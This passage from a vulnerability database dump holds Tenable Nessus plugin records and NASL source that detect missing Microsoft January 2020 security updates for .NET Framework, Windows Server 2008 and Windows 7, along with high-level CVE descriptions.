script_xref(name:\"MSFT\", value:\"MS20-4532935\");\n script_xref(name:\"MSFT\", value:\"MS20-4535101\");\n script_xref(name:\"MSFT\", value:\"MS20-4535103\");\n script_xref(name:\"MSFT\", value:\"MS20-4535102\");\n script_xref(name:\"MSFT\", value:\"MS20-4535105\");\n script_xref(name:\"MSFT\", value:\"MS20-4535104\");\n script_xref(name:\"MSFT\", value:\"MS20-4532933\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4532938\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534977\");\n script_xref(name:\"MSFT\", value:\"MS20-4534976\");\n script_xref(name:\"MSFT\", value:\"MS20-4532936\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534979\");\n script_xref(name:\"MSFT\", value:\"MS20-4534978\");\n script_xref(name:\"IAVA\", value:\"2020-A-0028\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (January 2020)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\");\n # https://support.microsoft.com/en-us/help/4532935/kb4532935-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71a4b34c\");\n # https://support.microsoft.com/en-us/help/4535101/kb4535101-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dd1d619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535103/kb4535103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535102/kb4535102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535105/kb4535105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535104/kb4535104\");\n # https://support.microsoft.com/en-us/help/4532933/kb4532933-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6758a7c\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n # 
https://support.microsoft.com/en-us/help/4532938/kb4532938-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f331705\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534977/kb4534977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534976/kb4534976\");\n # https://support.microsoft.com/en-us/help/4532936/kb4532936-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bff0836\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534979/kb4534979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534978/kb4534978\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-01';\nkbs = make_list(\n '4532935',\n '4535101',\n '4535103',\n '4535102',\n '4535105',\n '4535104',\n '4532933',\n '4534271',\n '4532938',\n '4534306',\n '4534977',\n '4534976',\n '4532936',\n '4534276',\n '4534293',\n '4534979',\n '4534978'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 
severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'01_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. 
(CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. 
(CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2020-0640)", "edition": 8, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534312: Windows Server 2008 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0615", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0635", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534303.NASL", "href": "https://www.tenable.com/plugins/nessus/132864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132864);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0608\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534312\");\n script_xref(name:\"MSKB\", value:\"4534303\");\n script_xref(name:\"MSFT\", value:\"MS20-4534312\");\n script_xref(name:\"MSFT\", value:\"MS20-4534303\");\n\n script_name(english:\"KB4534312: Windows Server 2008 January 2020 Security Update\");\n script_summary(english:\"Checks for 
rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. 
An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. 
An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\");\n # https://support.microsoft.com/en-us/help/4534312/windows-server-2008-update-kb4534312\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8064e787\");\n # https://support.microsoft.com/en-us/help/4534303/windows-server-2008-update-kb4534303\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d835d75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534312 or Cumulative Update KB4534303.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534303', '4534312');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534303, 4534312])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n 
exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:32:49", "description": "The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. 
An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534310.NASL", "href": "https://www.tenable.com/plugins/nessus/132866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132866);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534310\");\n script_xref(name:\"MSKB\", value:\"4534314\");\n script_xref(name:\"MSFT\", value:\"MS20-4534310\");\n script_xref(name:\"MSFT\", value:\"MS20-4534314\");\n\n script_name(english:\"KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. 
An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. 
By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 